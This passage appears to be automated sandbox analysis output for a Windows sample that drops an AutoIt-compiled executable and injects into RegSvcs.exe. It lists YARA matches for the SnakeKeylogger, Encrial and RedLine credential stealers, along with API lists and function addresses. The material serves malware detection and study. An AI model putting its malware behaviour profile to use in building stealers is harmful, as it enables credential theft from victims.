                  Source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.nonplacental.exe.3b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000005.00000002.2197923866.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000002.00000002.2081325248.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: This is a third-party compiled AutoIt script.0_2_00FD3B3A
                  Source: ref_97024130865.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ref_97024130865.exe, 00000000.00000000.2052580050.0000000001084000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7e0bcb6e-d
                  Source: ref_97024130865.exe, 00000000.00000000.2052580050.0000000001084000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f917a428-7
                  Source: ref_97024130865.exe, 00000000.00000003.2060707682.0000000003D83000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_52f4fc01-2
                  Source: ref_97024130865.exe, 00000000.00000003.2060707682.0000000003D83000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4a92ec0e-e
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: This is a third-party compiled AutoIt script.2_2_005F3B3A
                  Source: nonplacental.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: nonplacental.exe, 00000002.00000002.2080812875.00000000006A4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_11b494a7-3
                  Source: nonplacental.exe, 00000002.00000002.2080812875.00000000006A4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_a7d54ca7-9
                  Source: nonplacental.exe, 00000005.00000002.2196691732.00000000006A4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_64a12cc3-9
                  Source: nonplacental.exe, 00000005.00000002.2196691732.00000000006A4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_30f857b1-c
                  Source: ref_97024130865.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_97112700-6
                  Source: ref_97024130865.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_dfc54ab6-5
                  Source: nonplacental.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ed7bc412-9
                  Source: nonplacental.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d7daf398-c
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0103A1EF
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01028310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_01028310
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_010351BD
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006551BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_006551BD
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FFD9750_2_00FFD975
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF21C50_2_00FF21C5
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010503DA0_2_010503DA
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010062D20_2_010062D2
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF25FA0_2_00FF25FA
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0100242E0_2_0100242E
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FE66E10_2_00FE66E1
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FDE6A00_2_00FDE6A0
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0100878F0_2_0100878F
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0102E6160_2_0102E616
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FE88080_2_00FE8808
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010068440_2_01006844
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010508570_2_01050857
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010388890_2_01038889
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FFCB210_2_00FFCB21
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01006DB60_2_01006DB6
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FE6F9E0_2_00FE6F9E
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FE30300_2_00FE3030
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FFF1D90_2_00FFF1D9
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF31870_2_00FF3187
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD12870_2_00FD1287
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF14840_2_00FF1484
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FE55200_2_00FE5520
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF76960_2_00FF7696
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FE57600_2_00FE5760
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF19780_2_00FF1978
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01009AB50_2_01009AB5
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FDFCE00_2_00FDFCE0
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01057DDB0_2_01057DDB
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FFBDA60_2_00FFBDA6
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF1D900_2_00FF1D90
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FE3FE00_2_00FE3FE0
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FDDF000_2_00FDDF00
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_015847D80_2_015847D8
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_005FE6A02_2_005FE6A0
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0061D9752_2_0061D975
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_005FFCE02_2_005FFCE0
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006121C52_2_006121C5
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006262D22_2_006262D2
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006703DA2_2_006703DA
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0062242E2_2_0062242E
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006125FA2_2_006125FA
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0064E6162_2_0064E616
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006066E12_2_006066E1
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0062878F2_2_0062878F
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006268442_2_00626844
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006708572_2_00670857
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006088082_2_00608808
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006588892_2_00658889
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0061CB212_2_0061CB21
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00626DB62_2_00626DB6
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00606F9E2_2_00606F9E
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006030302_2_00603030
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0061F1D92_2_0061F1D9
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006131872_2_00613187
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_005F12872_2_005F1287
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006114842_2_00611484
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006055202_2_00605520
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006176962_2_00617696
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006057602_2_00605760
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006119782_2_00611978
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00629AB52_2_00629AB5
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00677DDB2_2_00677DDB
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0061BDA62_2_0061BDA6
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00611D902_2_00611D90
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_005FDF002_2_005FDF00
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00603FE02_2_00603FE0
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_017942E02_2_017942E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C603_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040DC113_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00407C3F3_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418CCC3_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00406CA03_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004028B03_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A4BE3_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004182443_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F203_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004193C43_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004187883_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F893_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402B903_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004073A03_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00F814483_2_00F81448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00F814393_2_00F81439
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00F811A83_2_00F811A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00F811993_2_00F81199
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 5_2_019483385_2_01948338
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004016506_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_025014436_2_02501443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_025014486_2_02501448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_025011A76_2_025011A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_025011A86_2_025011A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: String function: 005F7DE1 appears 36 times
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: String function: 00618900 appears 42 times
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: String function: 00610AE3 appears 70 times
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: String function: 00FF8900 appears 42 times
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: String function: 00FD7DE1 appears 35 times
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: String function: 00FF0AE3 appears 70 times
                  Source: ref_97024130865.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 5.2.nonplacental.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
